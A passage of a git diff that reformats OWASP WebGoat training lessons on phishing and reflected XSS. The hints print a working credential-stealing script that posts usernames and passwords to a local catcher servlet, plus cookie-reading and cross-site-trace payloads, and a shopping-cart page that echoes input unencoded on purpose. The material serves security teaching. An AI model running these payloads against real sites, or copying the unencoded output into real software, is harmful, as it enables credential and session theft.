-					 + "password&lt;form&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;&lt;H3&gt;This feature requires account login:&lt;/H2"
-					 + "&gt;&lt;br&gt;&lt;br&gt;Enter Username:&lt;br&gt;&lt;input type=&quot;text&quot; id=&quot;user&quot; "
-					 + "name=&quot;user&quot;&gt;&lt;br&gt;Enter Password:&lt;br&gt;&lt;input type=&quot;password&quot; "
-					 + "name = &quot;pass&quot;&gt;&lt;br&gt;&lt;/form&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;");
+						+ "password&lt;form&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;&lt;H3&gt;This feature requires account login:&lt;/H2"
+						+ "&gt;&lt;br&gt;&lt;br&gt;Enter Username:&lt;br&gt;&lt;input type=&quot;text&quot; id=&quot;user&quot; "
+						+ "name=&quot;user&quot;&gt;&lt;br&gt;Enter Password:&lt;br&gt;&lt;input type=&quot;password&quot; "
+						+ "name = &quot;pass&quot;&gt;&lt;br&gt;&lt;/form&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;");
 		hints
 				.add("Add functionality that can post a request, a button might work<BR><BR>"
-					 + "After getting the button on the page, don't forget you will need to steal the credentials and post them to: <BR>"
-					 + "http://localhost./WebGoat/capture/PROPERTY=yes&ADD_CREDENTIALS_HERE");
+						+ "After getting the button on the page, don't forget you will need to steal the credentials and post them to: <BR>"
+						+ "http://localhost./WebGoat/capture/PROPERTY=yes&ADD_CREDENTIALS_HERE");
 		hints
 				.add("Try: <BR> "
-					 + "&lt;input type=&quot;submit&quot; name=&quot;login&quot; "
-					 + "value=&quot;login&quot;&gt;"
-					 + "<BR><BR>Solution for this hint:<BR><BR>"
-					 + "password&lt;form&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;&lt;H3&gt;This feature requires account login:&lt;/H2"
-					 + "&gt;&lt;br&gt;&lt;br&gt;Enter Username:&lt;br&gt;&lt;input type=&quot;text&quot; id=&quot;user&quot; "
-					 + "name=&quot;user&quot;&gt;&lt;br&gt;Enter Password:&lt;br&gt;&lt;input type=&quot;password&quot; "
-					 + "name = &quot;pass&quot;&gt;&lt;br&gt;&lt;input type=&quot;submit&quot; name=&quot;login&quot; "
-					 + "value=&quot;login&quot; onclick=&quot;hack()&quot;&gt;&lt;/form&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;");
+						+ "&lt;input type=&quot;submit&quot; name=&quot;login&quot; "
+						+ "value=&quot;login&quot;&gt;"
+						+ "<BR><BR>Solution for this hint:<BR><BR>"
+						+ "password&lt;form&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;&lt;H3&gt;This feature requires account login:&lt;/H2"
+						+ "&gt;&lt;br&gt;&lt;br&gt;Enter Username:&lt;br&gt;&lt;input type=&quot;text&quot; id=&quot;user&quot; "
+						+ "name=&quot;user&quot;&gt;&lt;br&gt;Enter Password:&lt;br&gt;&lt;input type=&quot;password&quot; "
+						+ "name = &quot;pass&quot;&gt;&lt;br&gt;&lt;input type=&quot;submit&quot; name=&quot;login&quot; "
+						+ "value=&quot;login&quot; onclick=&quot;hack()&quot;&gt;&lt;/form&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;");
 		hints
 				.add("Make the button perform an action on submit, <BR>"
-					 + "adding an onclick=\"hack()\" might work<BR>"
-					 + "Don't forget to add the hack() javascript function"
-					 + "<BR><BR>Solution for this hint:<BR><BR>"
-					 + "password&lt;form&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;&lt;H3&gt;This feature requires account login:&lt;/H2"
-					 + "&gt;&lt;br&gt;&lt;br&gt;Enter Username:&lt;br&gt;&lt;input type=&quot;text&quot; id=&quot;user&quot; "
-					 + "name=&quot;user&quot;&gt;&lt;br&gt;Enter Password:&lt;br&gt;&lt;input type=&quot;password&quot; "
-					 + "name = &quot;pass&quot;&gt;&lt;br&gt;&lt;input type=&quot;submit&quot; name=&quot;login&quot; "
-					 + "value=&quot;login&quot; onclick=&quot;hack()&quot;&gt;&lt;/form&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;");
+						+ "adding an onclick=\"hack()\" might work<BR>"
+						+ "Don't forget to add the hack() javascript function"
+						+ "<BR><BR>Solution for this hint:<BR><BR>"
+						+ "password&lt;form&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;&lt;H3&gt;This feature requires account login:&lt;/H2"
+						+ "&gt;&lt;br&gt;&lt;br&gt;Enter Username:&lt;br&gt;&lt;input type=&quot;text&quot; id=&quot;user&quot; "
+						+ "name=&quot;user&quot;&gt;&lt;br&gt;Enter Password:&lt;br&gt;&lt;input type=&quot;password&quot; "
+						+ "name = &quot;pass&quot;&gt;&lt;br&gt;&lt;input type=&quot;submit&quot; name=&quot;login&quot; "
+						+ "value=&quot;login&quot; onclick=&quot;hack()&quot;&gt;&lt;/form&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;");
 		hints
 				.add("You need to create the hack() function.  This function will pull the credentials from the "
-					 + "webpage and post them to the WebGoat catcher servlet. <BR>"
-					 + "<BR> Some useful code snippets:<UL>"
-					 + "<LI>doucument.forms[0].user.value - will access the user field"
-					 + "<LI>XssImage = new Image(); XssImage.src=SOME_URL = will perform a post"
-					 + "<LI>javascript string concatentation uses a \"+\" </UL>"
-					 + "<BR><BR>Solution for this hint():<BR><BR>"
-					 + "password&lt;script&gt;function hack(){ alert(&quot;Had this been a real attack... Your credentials were just stolen."
-					 + "\nUser Name = &quot; + document.forms(0).user.value + &quot;\nPassword = &quot; +  document.forms(0).pass.value); "
-					 + "XSSImage=new Image; XSSImage.src=&quot;http://localhost./WebGoat/catcher?PROPERTY=yes&amp;user=&quot;+"
-					 + "document.forms(0).user.value + &quot;&amp;password=&quot; + document.forms(0).pass.value + &quot;&quot;;}"
-					 + "&lt;/script&gt;");
+						+ "webpage and post them to the WebGoat catcher servlet. <BR>"
+						+ "<BR> Some useful code snippets:<UL>"
+						+ "<LI>doucument.forms[0].user.value - will access the user field"
+						+ "<LI>XssImage = new Image(); XssImage.src=SOME_URL = will perform a post"
+						+ "<LI>javascript string concatentation uses a \"+\" </UL>"
+						+ "<BR><BR>Solution for this hint():<BR><BR>"
+						+ "password&lt;script&gt;function hack(){ alert(&quot;Had this been a real attack... Your credentials were just stolen."
+						+ "\nUser Name = &quot; + document.forms(0).user.value + &quot;\nPassword = &quot; +  document.forms(0).pass.value); "
+						+ "XSSImage=new Image; XSSImage.src=&quot;http://localhost./WebGoat/catcher?PROPERTY=yes&amp;user=&quot;+"
+						+ "document.forms(0).user.value + &quot;&amp;password=&quot; + document.forms(0).pass.value + &quot;&quot;;}"
+						+ "&lt;/script&gt;");
 		hints
 				.add("Complete solution for this lesson:<BR><BR>"
-					 + "password&lt;script&gt;function hack(){ alert(&quot;Had this been a real attack... Your credentials were just stolen."
-					 + "\nUser Name = &quot; + document.forms(0).user.value + &quot;\nPassword = &quot; +  document.forms(0).pass.value); "
-					 + "XSSImage=new Image; XSSImage.src=&quot;http://localhost./WebGoat/catcher?PROPERTY=yes&amp;user=&quot;+"
-					 + "document.forms(0).user.value + &quot;&amp;password=&quot; + document.forms(0).pass.value + &quot;&quot;;}"
-					 + "&lt;/script&gt;&lt;form&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;&lt;H3&gt;This feature requires account login:&lt;/H2"
-					 + "&gt;&lt;br&gt;&lt;br&gt;Enter Username:&lt;br&gt;&lt;input type=&quot;text&quot; id=&quot;user&quot; "
-					 + "name=&quot;user&quot;&gt;&lt;br&gt;Enter Password:&lt;br&gt;&lt;input type=&quot;password&quot; "
-					 + "name = &quot;pass&quot;&gt;&lt;br&gt;&lt;input type=&quot;submit&quot; name=&quot;login&quot; "
-					 + "value=&quot;login&quot; onclick=&quot;hack()&quot;&gt;&lt;/form&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;"
-					 + "<BR><BR>You may need to remove the '.' from the http://localhost./");
+						+ "password&lt;script&gt;function hack(){ alert(&quot;Had this been a real attack... Your credentials were just stolen."
+						+ "\nUser Name = &quot; + document.forms(0).user.value + &quot;\nPassword = &quot; +  document.forms(0).pass.value); "
+						+ "XSSImage=new Image; XSSImage.src=&quot;http://localhost./WebGoat/catcher?PROPERTY=yes&amp;user=&quot;+"
+						+ "document.forms(0).user.value + &quot;&amp;password=&quot; + document.forms(0).pass.value + &quot;&quot;;}"
+						+ "&lt;/script&gt;&lt;form&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;&lt;H3&gt;This feature requires account login:&lt;/H2"
+						+ "&gt;&lt;br&gt;&lt;br&gt;Enter Username:&lt;br&gt;&lt;input type=&quot;text&quot; id=&quot;user&quot; "
+						+ "name=&quot;user&quot;&gt;&lt;br&gt;Enter Password:&lt;br&gt;&lt;input type=&quot;password&quot; "
+						+ "name = &quot;pass&quot;&gt;&lt;br&gt;&lt;input type=&quot;submit&quot; name=&quot;login&quot; "
+						+ "value=&quot;login&quot; onclick=&quot;hack()&quot;&gt;&lt;/form&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;"
+						+ "<BR><BR>You may need to remove the '.' from the http://localhost./");
 		/**
-		 * password<script>function hack(){ alert("Had this been a real
-		 * attack... Your credentials were just stolen.\nUser Name = " +
-		 * document.forms(0).user.value + "\nPassword = " +
+		 * password<script>function hack(){ alert("Had this been a real attack... Your credentials
+		 * were just stolen.\nUser Name = " + document.forms(0).user.value + "\nPassword = " +
 		 * document.forms(0).pass.value); XSSImage=new Image;
 		 * XSSImage.src="http://localhost./WebGoat/catcher?PROPERTY=yes&user="+document.forms(0).user.value +
 		 * "&password=" + document.forms(0).pass.value + "";}</script><form><br>
@@ -257,14 +254,13 @@ public class Phishing extends LessonAdapter
 	 */
 	public String getInstructions(WebSession s)
 	{
-		String instructions =
-				"This lesson is an example of how a website might support a phishing attack<BR><BR>"
-						+ "Below is an example of a standard search feature.<br>"
-						+ "Using XSS and HTML insertion, your goal is to: <UL>"
-						+ "<LI>Insert html to that requests credentials"
-						+ "<LI>Add javascript to actually collect the credentials"
-						+ "<LI>Post the credentials to http://localhost./WebGoat/catcher?PROPERTY=yes...</UL> "
-						+ "To pass this lesson, the credentials must be posted to the catcher servlet.<BR>";
+		String instructions = "This lesson is an example of how a website might support a phishing attack<BR><BR>"
+				+ "Below is an example of a standard search feature.<br>"
+				+ "Using XSS and HTML insertion, your goal is to: <UL>"
+				+ "<LI>Insert html to that requests credentials"
+				+ "<LI>Add javascript to actually collect the credentials"
+				+ "<LI>Post the credentials to http://localhost./WebGoat/catcher?PROPERTY=yes...</UL> "
+				+ "To pass this lesson, the credentials must be posted to the catcher servlet.<BR>";
 
 		return (instructions);
 	}
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/RandomLessonAdapter.java b/main/project/JavaSource/org/owasp/webgoat/lessons/RandomLessonAdapter.java
index 402757a83..f45d1951e 100755
--- a/main/project/JavaSource/org/owasp/webgoat/lessons/RandomLessonAdapter.java
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/RandomLessonAdapter.java
@@ -1,56 +1,67 @@
+
 package org.owasp.webgoat.lessons;
 
 import org.owasp.webgoat.session.LessonTracker;
 import org.owasp.webgoat.session.RandomLessonTracker;
 import org.owasp.webgoat.session.WebSession;
 
-public abstract class RandomLessonAdapter extends LessonAdapter {
+
+public abstract class RandomLessonAdapter extends LessonAdapter
+{
 
 	public abstract String[] getStages();
-	
-	public void setStage(WebSession s, String stage) {
+
+	public void setStage(WebSession s, String stage)
+	{
 		getLessonTracker(s).setStage(stage);
 	}
-	
-	public String getStage(WebSession s) {
+
+	public String getStage(WebSession s)
+	{
 		return getLessonTracker(s).getStage();
 	}
-	
-	public void setStageComplete(WebSession s, String stage) {
+
+	public void setStageComplete(WebSession s, String stage)
+	{
 		RandomLessonTracker lt = getLessonTracker(s);
 		lt.setStageComplete(stage, true);
-		if (lt.getCompleted()) {
+		if (lt.getCompleted())
+		{
 			s.setMessage("Congratulations, you have completed this lab");
-		} else {
+		}
+		else
+		{
 			s.setMessage("You have completed " + stage + ".");
-			if (! stage.equals(lt.getStage()))
-				s.setMessage(" Welcome to " + lt.getStage());
+			if (!stage.equals(lt.getStage())) s.setMessage(" Welcome to " + lt.getStage());
 		}
 	}
-	
-	public boolean isStageComplete(WebSession s, String stage) {
+
+	public boolean isStageComplete(WebSession s, String stage)
+	{
 		return getLessonTracker(s).hasCompleted(stage);
 	}
-	
-	@Override
-    public RandomLessonTracker getLessonTracker(WebSession s) {
-    	return (RandomLessonTracker) super.getLessonTracker(s);
-    }
-
 
 	@Override
-	public RandomLessonTracker getLessonTracker(WebSession s, AbstractLesson lesson) {
+	public RandomLessonTracker getLessonTracker(WebSession s)
+	{
+		return (RandomLessonTracker) super.getLessonTracker(s);
+	}
+
+	@Override
+	public RandomLessonTracker getLessonTracker(WebSession s, AbstractLesson lesson)
+	{
 		return (RandomLessonTracker) super.getLessonTracker(s, lesson);
 	}
 
-
 	@Override
-	public RandomLessonTracker getLessonTracker(WebSession s, String userNameOverride) {
+	public RandomLessonTracker getLessonTracker(WebSession s, String userNameOverride)
+	{
 		return (RandomLessonTracker) super.getLessonTracker(s, userNameOverride);
 	}
 
 	@Override
-	public LessonTracker createLessonTracker() {
+	public LessonTracker createLessonTracker()
+	{
 		return new RandomLessonTracker(getStages());
 	}
 
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/ReflectedXSS.java b/main/project/JavaSource/org/owasp/webgoat/lessons/ReflectedXSS.java
index 15523c047..ec3d1b06f 100644
--- a/main/project/JavaSource/org/owasp/webgoat/lessons/ReflectedXSS.java
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/ReflectedXSS.java
@@ -1,9 +1,9 @@
+
 package org.owasp.webgoat.lessons;
 
 import java.util.ArrayList;
 import java.util.List;
 import java.util.regex.Pattern;
-
 import org.apache.ecs.Element;
 import org.apache.ecs.ElementContainer;
 import org.apache.ecs.html.BR;
@@ -19,276 +19,248 @@ import org.owasp.webgoat.session.ECSFactory;
 import org.owasp.webgoat.session.WebSession;
 import org.owasp.webgoat.util.HtmlEncoder;
 
-/*******************************************************************************
+
+/***************************************************************************************************
  * 
  * 
- * This file is part of WebGoat, an Open Web Application Security Project
- * utility. For details, please see http://www.owasp.org/
+ * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
+ * please see http://www.owasp.org/
  * 
  * Copyright (c) 2002 - 2007 Bruce Mayhew
  * 
- * This program is free software; you can redistribute it and/or modify it under
- * the terms of the GNU General Public License as published by the Free Software
- * Foundation; either version 2 of the License, or (at your option) any later
- * version.
+ * This program is free software; you can redistribute it and/or modify it under the terms of the
+ * GNU General Public License as published by the Free Software Foundation; either version 2 of the
+ * License, or (at your option) any later version.
  * 
- * This program is distributed in the hope that it will be useful, but WITHOUT
- * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
- * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
- * details.
+ * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
+ * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
+ * General Public License for more details.
  * 
- * You should have received a copy of the GNU General Public License along with
- * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
- * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * You should have received a copy of the GNU General Public License along with this program; if
+ * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
+ * 02111-1307, USA.
  * 
  * Getting Source ==============
  * 
- * Source for this application is maintained at code.google.com, a repository
- * for free software projects.
+ * Source for this application is maintained at code.google.com, a repository for free software
+ * projects.
  * 
  * For details, please see http://code.google.com/p/webgoat/
- *
- * @author     Bruce Mayhew <a href="http://code.google.com/p/webgoat">WebGoat</a>
- * @created    October 28, 2003
+ * 
+ * @author Bruce Mayhew <a href="http://code.google.com/p/webgoat">WebGoat</a>
+ * @created October 28, 2003
  */
 
 public class ReflectedXSS extends LessonAdapter
 {
-    /**
-     *  Description of the Method
-     *
-     * @param  s  Description of the Parameter
-     * @return    Description of the Return Value
-     */
+	/**
+	 * Description of the Method
+	 * 
+	 * @param s
+	 *            Description of the Parameter
+	 * @return Description of the Return Value
+	 */
 
-    protected Element createContent(WebSession s)
-    {
-
-	ElementContainer ec = new ElementContainer();
-	String regex1 = "^[0-9]{3}$";// any three digits
-	Pattern pattern1 = Pattern.compile(regex1);
-
-	try
+	protected Element createContent(WebSession s)
 	{
-	    String param1 = s.getParser().getRawParameter("field1", "111");
-	    String param2 = HtmlEncoder.encode(s.getParser().getRawParameter(
-		    "field2", "4128 3214 0002 1999"));
-	    float quantity = 1.0f;
-	    float total = 0.0f;
-	    float runningTotal = 0.0f;
 
-	    // test input field1
-	    if (!pattern1.matcher(param1).matches())
-	    {
-		if (param1.toLowerCase().indexOf("script") != -1)
+		ElementContainer ec = new ElementContainer();
+		String regex1 = "^[0-9]{3}$";// any three digits
+		Pattern pattern1 = Pattern.compile(regex1);
+
+		try
 		{
-		    makeSuccess(s);
+			String param1 = s.getParser().getRawParameter("field1", "111");
+			String param2 = HtmlEncoder.encode(s.getParser().getRawParameter("field2", "4128 3214 0002 1999"));
+			float quantity = 1.0f;
+			float total = 0.0f;
+			float runningTotal = 0.0f;
+
+			// test input field1
+			if (!pattern1.matcher(param1).matches())
+			{
+				if (param1.toLowerCase().indexOf("script") != -1)
+				{
+					makeSuccess(s);
+				}
+
+				s.setMessage("Whoops! You entered " + param1 + " instead of your three digit code.  Please try again.");
+			}
+
+			// FIXME: encode output of field2, then s.setMessage( field2 );
+
+			ec.addElement(new HR().setWidth("90%"));
+			ec.addElement(new Center().addElement(new H1().addElement("Shopping Cart ")));
+			Table t = new Table().setCellSpacing(0).setCellPadding(2).setBorder(1).setWidth("90%").setAlign("center");
+
+			if (s.isColor())
+			{
+				t.setBorder(1);
+			}
+
+			TR tr = new TR();
+			tr.addElement(new TH().addElement("Shopping Cart Items -- To Buy Now").setWidth("80%"));
+			tr.addElement(new TH().addElement("Price").setWidth("10%"));
+			tr.addElement(new TH().addElement("Quantity").setWidth("3%"));
+			tr.addElement(new TH().addElement("Total").setWidth("7%"));
+			t.addElement(tr);
+
+			tr = new TR();
+			tr.addElement(new TD().addElement("Studio RTA - Laptop/Reading Cart with Tilting Surface - Cherry "));
+			tr.addElement(new TD().addElement("69.99").setAlign("right"));
+			tr.addElement(new TD().addElement(
+												new Input(Input.TEXT, "QTY1", s.getParser().getStringParameter("QTY1",
+																												"1")))
+					.setAlign("right"));
+			quantity = s.getParser().getFloatParameter("QTY1", 0.0f);
+			total = quantity * 69.99f;
+			runningTotal += total;
+			tr.addElement(new TD().addElement("$" + total));
+			t.addElement(tr);
+			tr = new TR();
+			tr.addElement(new TD().addElement("Dynex - Traditional Notebook Case"));
+			tr.addElement(new TD().addElement("27.99").setAlign("right"));
+			tr.addElement(new TD().addElement(
+												new Input(Input.TEXT, "QTY2", s.getParser().getStringParameter("QTY2",
+																												"1")))
+					.setAlign("right"));
+			quantity = s.getParser().getFloatParameter("QTY2", 0.0f);
+			total = quantity * 27.99f;
+			runningTotal += total;
+			tr.addElement(new TD().addElement("$" + total));
+			t.addElement(tr);
+			tr = new TR();
+			tr.addElement(new TD().addElement("Hewlett-Packard - Pavilion Notebook with Intel Centrino"));
+			tr.addElement(new TD().addElement("1599.99").setAlign("right"));
+			tr.addElement(new TD().addElement(
+												new Input(Input.TEXT, "QTY3", s.getParser().getStringParameter("QTY3",
+																												"1")))
+					.setAlign("right"));
+			quantity = s.getParser().getFloatParameter("QTY3", 0.0f);
+			total = quantity * 1599.99f;
+			runningTotal += total;
+			tr.addElement(new TD().addElement("$" + total));
+			t.addElement(tr);
+			tr = new TR();
+			tr.addElement(new TD().addElement("3 - Year Performance Service Plan $1000 and Over "));
+			tr.addElement(new TD().addElement("299.99").setAlign("right"));
+
+			tr.addElement(new TD().addElement(
+												new Input(Input.TEXT, "QTY4", s.getParser().getStringParameter("QTY4",
+																												"1")))
+					.setAlign("right"));
+			quantity = s.getParser().getFloatParameter("QTY4", 0.0f);
+			total = quantity * 299.99f;
+			runningTotal += total;
+			tr.addElement(new TD().addElement("$" + total));
+			t.addElement(tr);
+
+			ec.addElement(t);
+
+			t = new Table().setCellSpacing(0).setCellPadding(2).setBorder(0).setWidth("90%").setAlign("center");
+
+			if (s.isColor())
+			{
+				t.setBorder(1);
+			}
+
+			ec.addElement(new BR());
+
+			tr = new TR();
+			tr.addElement(new TD().addElement("The total charged to your credit card:"));
+			tr.addElement(new TD().addElement("$" + runningTotal));
+			tr.addElement(new TD().addElement(ECSFactory.makeButton("Update Cart")));
+			t.addElement(tr);
+			tr = new TR();
+			tr.addElement(new TD().addElement("&nbsp;").setColSpan(2));
+			t.addElement(tr);
+			tr = new TR();
+			tr.addElement(new TD().addElement("Enter your credit card number:"));
+			tr.addElement(new TD().addElement(new Input(Input.TEXT, "field2", param2)));
+			t.addElement(tr);
+			tr = new TR();
+			tr.addElement(new TD().addElement("Enter your three digit access code:"));
+			tr.addElement(new TD().addElement("<input name='field1' type='TEXT' value='" + param1 + "'>"));
+			// tr.addElement(new TD().addElement(new Input(Input.TEXT, "field1",param1)));
+			t.addElement(tr);
+
+			Element b = ECSFactory.makeButton("Purchase");
+			tr = new TR();
+			tr.addElement(new TD().addElement(b).setColSpan(2).setAlign("center"));
+			t.addElement(tr);
+
+			ec.addElement(t);
+			ec.addElement(new BR());
+			ec.addElement(new HR().setWidth("90%"));
+		} catch (Exception e)
+		{
+			s.setMessage("Error generating " + this.getClass().getName());
+			e.printStackTrace();
 		}
-
-		s
-			.setMessage("Whoops! You entered "
-				+ param1
-				+ " instead of your three digit code.  Please try again.");
-	    }
-
-	    // FIXME: encode output of field2, then s.setMessage( field2 );
-
-	    ec.addElement(new HR().setWidth("90%"));
-	    ec.addElement(new Center().addElement(new H1()
-		    .addElement("Shopping Cart ")));
-	    Table t = new Table().setCellSpacing(0).setCellPadding(2)
-		    .setBorder(1).setWidth("90%").setAlign("center");
-
-	    if (s.isColor())
-	    {
-		t.setBorder(1);
-	    }
-
-	    TR tr = new TR();
-	    tr.addElement(new TH().addElement(
-		    "Shopping Cart Items -- To Buy Now").setWidth("80%"));
-	    tr.addElement(new TH().addElement("Price").setWidth("10%"));
-	    tr.addElement(new TH().addElement("Quantity").setWidth("3%"));
-	    tr.addElement(new TH().addElement("Total").setWidth("7%"));
-	    t.addElement(tr);
-
-	    tr = new TR();
-	    tr
-		    .addElement(new TD()
-			    .addElement("Studio RTA - Laptop/Reading Cart with Tilting Surface - Cherry "));
-	    tr.addElement(new TD().addElement("69.99").setAlign("right"));
-	    tr.addElement(new TD().addElement(
-		    new Input(Input.TEXT, "QTY1", s.getParser()
-			    .getStringParameter("QTY1", "1")))
-		    .setAlign("right"));
-	    quantity = s.getParser().getFloatParameter("QTY1", 0.0f);
-	    total = quantity * 69.99f;
-	    runningTotal += total;
-	    tr.addElement(new TD().addElement("$" + total));
-	    t.addElement(tr);
-	    tr = new TR();
-	    tr.addElement(new TD()
-		    .addElement("Dynex - Traditional Notebook Case"));
-	    tr.addElement(new TD().addElement("27.99").setAlign("right"));
-	    tr.addElement(new TD().addElement(
-		    new Input(Input.TEXT, "QTY2", s.getParser()
-			    .getStringParameter("QTY2", "1")))
-		    .setAlign("right"));
-	    quantity = s.getParser().getFloatParameter("QTY2", 0.0f);
-	    total = quantity * 27.99f;
-	    runningTotal += total;
-	    tr.addElement(new TD().addElement("$" + total));
-	    t.addElement(tr);
-	    tr = new TR();
-	    tr
-		    .addElement(new TD()
-			    .addElement("Hewlett-Packard - Pavilion Notebook with Intel Centrino"));
-	    tr.addElement(new TD().addElement("1599.99").setAlign("right"));
-	    tr.addElement(new TD().addElement(
-		    new Input(Input.TEXT, "QTY3", s.getParser()
-			    .getStringParameter("QTY3", "1")))
-		    .setAlign("right"));
-	    quantity = s.getParser().getFloatParameter("QTY3", 0.0f);
-	    total = quantity * 1599.99f;
-	    runningTotal += total;
-	    tr.addElement(new TD().addElement("$" + total));
-	    t.addElement(tr);
-	    tr = new TR();
-	    tr
-		    .addElement(new TD()
-			    .addElement("3 - Year Performance Service Plan $1000 and Over "));
-	    tr.addElement(new TD().addElement("299.99").setAlign("right"));
-
-	    tr.addElement(new TD().addElement(
-		    new Input(Input.TEXT, "QTY4", s.getParser()
-			    .getStringParameter("QTY4", "1")))
-		    .setAlign("right"));
-	    quantity = s.getParser().getFloatParameter("QTY4", 0.0f);
-	    total = quantity * 299.99f;
-	    runningTotal += total;
-	    tr.addElement(new TD().addElement("$" + total));
-	    t.addElement(tr);
-
-	    ec.addElement(t);
-
-	    t = new Table().setCellSpacing(0).setCellPadding(2).setBorder(0)
-		    .setWidth("90%").setAlign("center");
-
-	    if (s.isColor())
-	    {
-		t.setBorder(1);
-	    }
-
-	    ec.addElement(new BR());
-
-	    tr = new TR();
-	    tr.addElement(new TD()
-		    .addElement("The total charged to your credit card:"));
-	    tr.addElement(new TD().addElement("$" + runningTotal));
-	    tr.addElement(new TD().addElement(ECSFactory
-		    .makeButton("Update Cart")));
-	    t.addElement(tr);
-	    tr = new TR();
-	    tr.addElement(new TD().addElement("&nbsp;").setColSpan(2));
-	    t.addElement(tr);
-	    tr = new TR();
-	    tr
-		    .addElement(new TD()
-			    .addElement("Enter your credit card number:"));
-	    tr.addElement(new TD().addElement(new Input(Input.TEXT, "field2",
-		    param2)));
-	    t.addElement(tr);
-	    tr = new TR();
-	    tr.addElement(new TD()
-		    .addElement("Enter your three digit access code:"));
-	    tr.addElement(new TD().addElement("<input name='field1' type='TEXT' value='" + param1 + "'>"));
-	    //tr.addElement(new TD().addElement(new Input(Input.TEXT, "field1",param1)));
-	    t.addElement(tr);
-
-	    Element b = ECSFactory.makeButton("Purchase");
-	    tr = new TR();
-	    tr.addElement(new TD().addElement(b).setColSpan(2).setAlign(
-		    "center"));
-	    t.addElement(tr);
-
-	    ec.addElement(t);
-	    ec.addElement(new BR());
-	    ec.addElement(new HR().setWidth("90%"));
+		return (ec);
 	}
-	catch (Exception e)
+
+	/**
+	 * DOCUMENT ME!
+	 * 
+	 * @return DOCUMENT ME!
+	 */
+	protected Category getDefaultCategory()
 	{
-	    s.setMessage("Error generating " + this.getClass().getName());
-	    e.printStackTrace();
+		return Category.XSS;
 	}
-	return (ec);
-    }
 
+	/**
+	 * Gets the hints attribute of the AccessControlScreen object
+	 * 
+	 * @return The hints value
+	 */
+	protected List<String> getHints(WebSession s)
+	{
+		List<String> hints = new ArrayList<String>();
+		hints.add("A simple script is &lt;SCRIPT&gt;alert('bang!');&lt;/SCRIPT&gt;.");
+		hints.add("Can you get the script to disclose the JSESSIONID cookie?");
+		hints.add("You can use &lt;SCRIPT&gt;alert(document.cookie);&lt;/SCRIPT&gt; to access the session id cookie");
+		hints.add("Can you get the script to access the credit card form field?");
+		hints
+				.add("Try a cross site trace (XST) Command:<br>"
+						+ "&lt;script type=\"text/javascript\"&gt;if ( navigator.appName.indexOf(\"Microsoft\") !=-1)"
+						+ " {var xmlHttp = new ActiveXObject(\"Microsoft.XMLHTTP\");xmlHttp.open(\"TRACE\", \"./\", false);"
+						+ " xmlHttp.send();str1=xmlHttp.responseText; while (str1.indexOf(\"\\n\") > -1) str1 = str1.replace(\"\\n\",\"&lt;br&gt;\"); "
+						+ "document.write(str1);}&lt;/script&gt;");
+		return hints;
+	}
 
-    /**
-     *  DOCUMENT ME!
-     *
-     * @return    DOCUMENT ME!
-     */
-    protected Category getDefaultCategory()
-    {
-	return Category.XSS;
-    }
+	// <script type="text/javascript">if ( navigator.appName.indexOf("Microsoft") !=-1) {var xmlHttp
+	// = new
+	// ActiveXObject("Microsoft.XMLHTTP");xmlHttp.open("TRACE", "./", false);
+	// xmlHttp.send();str1=xmlHttp.responseText;document.write(str1);}</script>
+	/**
+	 * Gets the instructions attribute of the WeakAccessControl object
+	 * 
+	 * @return The instructions value
+	 */
+	public String getInstructions(WebSession s)
+	{
+		String instructions = "For this exercise, your mission is to come up with some input containing a script. You have to try to get this page to reflect that input back to your browser, which will execute the script and do something bad.";
+		return (instructions);
+	}
 
+	private final static Integer DEFAULT_RANKING = new Integer(120);
 
-    /**
-     *  Gets the hints attribute of the AccessControlScreen object
-     *
-     * @return    The hints value
-     */
-    protected List<String> getHints(WebSession s)
-    {
-	List<String> hints = new ArrayList<String>();
-	hints
-		.add("A simple script is &lt;SCRIPT&gt;alert('bang!');&lt;/SCRIPT&gt;.");
-	hints.add("Can you get the script to disclose the JSESSIONID cookie?");
-	hints
-		.add("You can use &lt;SCRIPT&gt;alert(document.cookie);&lt;/SCRIPT&gt; to access the session id cookie");
-	hints
-		.add("Can you get the script to access the credit card form field?");
-	hints
-		.add("Try a cross site trace (XST) Command:<br>"
-			+ "&lt;script type=\"text/javascript\"&gt;if ( navigator.appName.indexOf(\"Microsoft\") !=-1)"
-			+ " {var xmlHttp = new ActiveXObject(\"Microsoft.XMLHTTP\");xmlHttp.open(\"TRACE\", \"./\", false);"
-			+ " xmlHttp.send();str1=xmlHttp.responseText; while (str1.indexOf(\"\\n\") > -1) str1 = str1.replace(\"\\n\",\"&lt;br&gt;\"); "
-			+ "document.write(str1);}&lt;/script&gt;");
-	return hints;
-    }
+	protected Integer getDefaultRanking()
+	{
+		return DEFAULT_RANKING;
+	}
 
+	/**
+	 * Gets the title attribute of the AccessControlScreen object
+	 * 
+	 * @return The title value
+	 */
+	public String getTitle()
+	{
+		return "Reflected XSS Attacks";
+	}
 
